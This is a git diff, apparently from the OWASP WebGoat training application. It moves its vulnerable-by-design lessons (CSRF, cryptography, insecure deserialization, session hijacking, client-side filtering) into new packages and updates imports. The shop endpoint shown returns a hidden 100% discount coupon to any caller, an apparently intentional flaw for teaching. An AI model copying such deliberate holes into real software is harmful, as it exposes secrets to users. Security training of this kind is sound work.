-package org.owasp.webgoat.client_side_filtering;
+package org.owasp.webgoat.lessons.client_side_filtering;
 
 import lombok.extern.slf4j.Slf4j;
 import org.springframework.beans.factory.annotation.Value;
@@ -57,7 +57,7 @@ public class Salaries {
 
     @PostConstruct
     public void copyFiles() {
-        ClassPathResource classPathResource = new ClassPathResource("employees.xml");
+        ClassPathResource classPathResource = new ClassPathResource("lessons/employees.xml");
         File targetDirectory = new File(webGoatHomeDirectory, "/ClientSideFiltering");
         if (!targetDirectory.exists()) {
             targetDirectory.mkdir();
diff --git a/webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/ShopEndpoint.java b/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ShopEndpoint.java
similarity index 88%
rename from webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/ShopEndpoint.java
rename to src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ShopEndpoint.java
index 283c0662d..9e9bcf200 100644
--- a/webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/ShopEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ShopEndpoint.java
@@ -20,10 +20,9 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.client_side_filtering;
-
-import com.beust.jcommander.internal.Lists;
+package org.owasp.webgoat.lessons.client_side_filtering;
 
+import com.google.common.collect.Lists;
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 
@@ -36,8 +35,6 @@ import org.springframework.web.bind.annotation.RestController;
 import java.util.List;
 import java.util.Optional;
 
-import static org.owasp.webgoat.client_side_filtering.ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE;
-
 /**
  * @author nbaars
  * @since 4/6/17.
@@ -76,8 +73,8 @@ public class ShopEndpoint {
 
     @GetMapping(value = "/coupons/{code}", produces = MediaType.APPLICATION_JSON_VALUE)
     public CheckoutCode getDiscountCode(@PathVariable String code) {
-        if (SUPER_COUPON_CODE.equals(code)) {
-            return new CheckoutCode(SUPER_COUPON_CODE, 100);
+        if (ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE.equals(code)) {
+            return new CheckoutCode(ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE, 100);
         }
         return checkoutCodes.get(code).orElse(new CheckoutCode("no", 0));
     }
@@ -86,7 +83,7 @@ public class ShopEndpoint {
     public CheckoutCodes all() {
         List<CheckoutCode> all = Lists.newArrayList();
         all.addAll(this.checkoutCodes.getCodes());
-        all.add(new CheckoutCode(SUPER_COUPON_CODE, 100));
+        all.add(new CheckoutCode(ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE, 100));
         return new CheckoutCodes(all);
     }
 }
diff --git a/webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/CryptoUtil.java b/src/main/java/org/owasp/webgoat/lessons/cryptography/CryptoUtil.java
similarity index 98%
rename from webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/CryptoUtil.java
rename to src/main/java/org/owasp/webgoat/lessons/cryptography/CryptoUtil.java
index 5d74d02f5..d3bf9f2e4 100644
--- a/webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/CryptoUtil.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cryptography/CryptoUtil.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.crypto;
+package org.owasp.webgoat.lessons.cryptography;
 
 import lombok.extern.slf4j.Slf4j;
 
@@ -132,4 +132,4 @@ public class CryptoUtil {
       	return kf.generatePrivate(spec);
 	}
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/Crypto.java b/src/main/java/org/owasp/webgoat/lessons/cryptography/Cryptography.java
similarity index 87%
rename from webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/Crypto.java
rename to src/main/java/org/owasp/webgoat/lessons/cryptography/Cryptography.java
index 30f4a2e35..6ccd96951 100644
--- a/webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/Crypto.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cryptography/Cryptography.java
@@ -20,14 +20,14 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.crypto;
+package org.owasp.webgoat.lessons.cryptography;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 @Component
-public class Crypto extends Lesson {
+public class Cryptography extends Lesson {
     @Override
     public Category getDefaultCategory() {
         return Category.GENERAL;
diff --git a/webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/EncodingAssignment.java b/src/main/java/org/owasp/webgoat/lessons/cryptography/EncodingAssignment.java
similarity index 94%
rename from webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/EncodingAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/cryptography/EncodingAssignment.java
index 867a61299..41d2d6421 100644
--- a/webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/EncodingAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cryptography/EncodingAssignment.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.crypto;
+package org.owasp.webgoat.lessons.cryptography;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.PostMapping;
diff --git a/webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/HashingAssignment.java b/src/main/java/org/owasp/webgoat/lessons/cryptography/HashingAssignment.java
similarity index 94%
rename from webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/HashingAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/cryptography/HashingAssignment.java
index dddb870e9..89cc05262 100644
--- a/webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/HashingAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cryptography/HashingAssignment.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.crypto;
+package org.owasp.webgoat.lessons.cryptography;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestMapping;
diff --git a/webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/SecureDefaultsAssignment.java b/src/main/java/org/owasp/webgoat/lessons/cryptography/SecureDefaultsAssignment.java
similarity index 90%
rename from webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/SecureDefaultsAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/cryptography/SecureDefaultsAssignment.java
index 1af714de9..90435e503 100644
--- a/webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/SecureDefaultsAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cryptography/SecureDefaultsAssignment.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.crypto;
+package org.owasp.webgoat.lessons.cryptography;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/SigningAssignment.java b/src/main/java/org/owasp/webgoat/lessons/cryptography/SigningAssignment.java
similarity index 93%
rename from webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/SigningAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/cryptography/SigningAssignment.java
index fe4e16da1..40a910522 100644
--- a/webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/SigningAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cryptography/SigningAssignment.java
@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.crypto;
+package org.owasp.webgoat.lessons.cryptography;
 
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestMapping;
diff --git a/webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/XOREncodingAssignment.java b/src/main/java/org/owasp/webgoat/lessons/cryptography/XOREncodingAssignment.java
similarity index 88%
rename from webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/XOREncodingAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/cryptography/XOREncodingAssignment.java
index e4b6c1279..68a8be8b5 100644
--- a/webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/XOREncodingAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cryptography/XOREncodingAssignment.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.crypto;
+package org.owasp.webgoat.lessons.cryptography;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRF.java b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRF.java
similarity index 90%
rename from webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRF.java
rename to src/main/java/org/owasp/webgoat/lessons/csrf/CSRF.java
index 183ef03c8..675054d75 100644
--- a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRF.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRF.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.csrf;
+package org.owasp.webgoat.lessons.csrf;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFConfirmFlag1.java b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFConfirmFlag1.java
similarity index 88%
rename from webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFConfirmFlag1.java
rename to src/main/java/org/owasp/webgoat/lessons/csrf/CSRFConfirmFlag1.java
index 83c7df15c..ba012e56e 100644
--- a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFConfirmFlag1.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFConfirmFlag1.java
@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.csrf;
+package org.owasp.webgoat.lessons.csrf;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.UserSessionData;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFFeedback.java b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
similarity index 94%
rename from webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFFeedback.java
rename to src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
index 9d9a0e1bf..3e5a0f109 100644
--- a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFFeedback.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
@@ -20,15 +20,15 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.csrf;
+package org.owasp.webgoat.lessons.csrf;
 
 import com.fasterxml.jackson.databind.DeserializationFeature;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import org.apache.commons.lang3.exception.ExceptionUtils;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.UserSessionData;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.PostMapping;
diff --git a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFGetFlag.java b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFGetFlag.java
similarity index 95%
rename from webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFGetFlag.java
rename to src/main/java/org/owasp/webgoat/lessons/csrf/CSRFGetFlag.java
index d3cb3fc83..857df9997 100644
--- a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFGetFlag.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFGetFlag.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.csrf;
+package org.owasp.webgoat.lessons.csrf;
 
-import org.owasp.webgoat.i18n.PluginMessages;
-import org.owasp.webgoat.session.UserSessionData;
+import org.owasp.webgoat.container.i18n.PluginMessages;
+import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RequestMethod;
diff --git a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFLogin.java b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFLogin.java
similarity index 87%
rename from webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFLogin.java
rename to src/main/java/org/owasp/webgoat/lessons/csrf/CSRFLogin.java
index 05e55c8eb..238886b23 100644
--- a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFLogin.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFLogin.java
@@ -20,13 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.csrf;
+package org.owasp.webgoat.lessons.csrf;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.users.UserTracker;
-import org.owasp.webgoat.users.UserTrackerRepository;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.users.UserTracker;
+import org.owasp.webgoat.container.users.UserTrackerRepository;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
diff --git a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/ForgedReviews.java b/src/main/java/org/owasp/webgoat/lessons/csrf/ForgedReviews.java
similarity index 93%
rename from webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/ForgedReviews.java
rename to src/main/java/org/owasp/webgoat/lessons/csrf/ForgedReviews.java
index 4241421b9..d91b906c5 100644
--- a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/ForgedReviews.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/ForgedReviews.java
@@ -20,16 +20,16 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.csrf;
+package org.owasp.webgoat.lessons.csrf;
 
-import com.beust.jcommander.internal.Lists;
+import com.google.common.collect.Lists;
 import org.joda.time.DateTime;
 import org.joda.time.format.DateTimeFormat;
 import org.joda.time.format.DateTimeFormatter;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.GetMapping;
diff --git a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/Review.java b/src/main/java/org/owasp/webgoat/lessons/csrf/Review.java
similarity index 97%
rename from webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/Review.java
rename to src/main/java/org/owasp/webgoat/lessons/csrf/Review.java
index f5280f8e6..06e623791 100644
--- a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/Review.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/Review.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.csrf;
+package org.owasp.webgoat.lessons.csrf;
 
 import lombok.AllArgsConstructor;
 import lombok.Getter;
diff --git a/webgoat-lessons/insecure-deserialization/src/main/java/org/owasp/webgoat/deserialization/InsecureDeserialization.java b/src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserialization.java
similarity index 91%
rename from webgoat-lessons/insecure-deserialization/src/main/java/org/owasp/webgoat/deserialization/InsecureDeserialization.java
rename to src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserialization.java
index a5a6c46f0..fba6be389 100644
--- a/webgoat-lessons/insecure-deserialization/src/main/java/org/owasp/webgoat/deserialization/InsecureDeserialization.java
+++ b/src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserialization.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.deserialization;
+package org.owasp.webgoat.lessons.deserialization;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/webgoat-lessons/insecure-deserialization/src/main/java/org/owasp/webgoat/deserialization/InsecureDeserializationTask.java b/src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserializationTask.java
similarity index 93%
rename from webgoat-lessons/insecure-deserialization/src/main/java/org/owasp/webgoat/deserialization/InsecureDeserializationTask.java
rename to src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserializationTask.java
index a1e0180ee..f207b45ef 100644
--- a/webgoat-lessons/insecure-deserialization/src/main/java/org/owasp/webgoat/deserialization/InsecureDeserializationTask.java
+++ b/src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserializationTask.java
@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.deserialization;
+package org.owasp.webgoat.lessons.deserialization;
 
 import org.dummy.insecure.framework.VulnerableTaskHolder;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
@@ -78,4 +78,4 @@ public class InsecureDeserializationTask extends AssignmentEndpoint {
         }
         return success(this).build();
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/insecure-deserialization/src/main/java/org/owasp/webgoat/deserialization/SerializationHelper.java b/src/main/java/org/owasp/webgoat/lessons/deserialization/SerializationHelper.java
similarity index 97%
rename from webgoat-lessons/insecure-deserialization/src/main/java/org/owasp/webgoat/deserialization/SerializationHelper.java
rename to src/main/java/org/owasp/webgoat/lessons/deserialization/SerializationHelper.java
index 8fbb46dc8..f6ac82bb3 100644
--- a/webgoat-lessons/insecure-deserialization/src/main/java/org/owasp/webgoat/deserialization/SerializationHelper.java
+++ b/src/main/java/org/owasp/webgoat/lessons/deserialization/SerializationHelper.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.deserialization;
+package org.owasp.webgoat.lessons.deserialization;
 
 import java.io.ByteArrayInputStream;
 import java.io.ByteArrayOutputStream;
diff --git a/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/HijackSession.java b/src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSession.java
similarity index 90%
rename from webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/HijackSession.java
rename to src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSession.java
index a03929754..51c3c616a 100644
--- a/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/HijackSession.java
+++ b/src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSession.java
@@ -21,10 +21,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.hijacksession;
+package org.owasp.webgoat.lessons.hijacksession;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /***
diff --git a/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/HijackSessionAssignment.java b/src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSessionAssignment.java
similarity index 88%
rename from webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/HijackSessionAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSessionAssignment.java
index 0500f3e7f..bc18ca680 100644
--- a/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/HijackSessionAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSessionAssignment.java
@@ -20,17 +20,17 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.hijacksession;
+package org.owasp.webgoat.lessons.hijacksession;
 
 import javax.servlet.http.Cookie;
 import javax.servlet.http.HttpServletResponse;
 
 import org.apache.commons.lang3.StringUtils;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.hijacksession.cas.Authentication;
-import org.owasp.webgoat.hijacksession.cas.HijackSessionAuthenticationProvider;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.lessons.hijacksession.cas.Authentication;
+import org.owasp.webgoat.lessons.hijacksession.cas.HijackSessionAuthenticationProvider;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.CookieValue;
 import org.springframework.web.bind.annotation.PostMapping;
diff --git a/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/Authentication.java b/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/Authentication.java
similarity index 97%
rename from webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/Authentication.java
rename to src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/Authentication.java
index 2ee9e069a..72bfae5ec 100644
--- a/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/Authentication.java
+++ b/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/Authentication.java
@@ -21,7 +21,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.hijacksession.cas;
+package org.owasp.webgoat.lessons.hijacksession.cas;
 
 import java.security.Principal;
 
diff --git a/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/AuthenticationProvider.java b/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/AuthenticationProvider.java
similarity index 95%
rename from webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/AuthenticationProvider.java
rename to src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/AuthenticationProvider.java
index 0db7cf40d..9d5447296 100644
--- a/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/AuthenticationProvider.java
+++ b/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/AuthenticationProvider.java
@@ -21,7 +21,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.hijacksession.cas;
+package org.owasp.webgoat.lessons.hijacksession.cas;
 
 import java.security.Principal;
 
diff --git a/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/HijackSessionAuthenticationProvider.java b/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/HijackSessionAuthenticationProvider.java
similarity index 98%
rename from webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/HijackSessionAuthenticationProvider.java
rename to src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/HijackSessionAuthenticationProvider.java
index 63ca046f6..b59720bfc 100644
--- a/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/HijackSessionAuthenticationProvider.java
+++ b/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/HijackSessionAuthenticationProvider.java
@@ -21,7 +21,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.hijacksession.cas;
+package org.owasp.webgoat.lessons.hijacksession.cas;
 
 import java.time.Instant;
 import java.util.LinkedList;
diff --git a/webgoat-lessons/html-tampering/src/main/java/org/owasp/webgoat/html_tampering/HtmlTampering.java b/src/main/java/org/owasp/webgoat/lessons/html_tampering/HtmlTampering.java
similarity index 91%
rename from webgoat-lessons/html-tampering/src/main/java/org/owasp/webgoat/html_tampering/HtmlTampering.java
rename to src/main/java/org/owasp/webgoat/lessons/html_tampering/HtmlTampering.java
index 5ed14b1e9..bb8ccdc68 100644
--- a/webgoat-lessons/html-tampering/src/main/java/org/owasp/webgoat/html_tampering/HtmlTampering.java
+++ b/src/main/java/org/owasp/webgoat/lessons/html_tampering/HtmlTampering.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.html_tampering;
+package org.owasp.webgoat.lessons.html_tampering;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/webgoat-lessons/html-tampering/src/main/java/org/owasp/webgoat/html_tampering/HtmlTamperingTask.java b/src/main/java/org/owasp/webgoat/lessons/html_tampering/HtmlTamperingTask.java
similarity index 88%
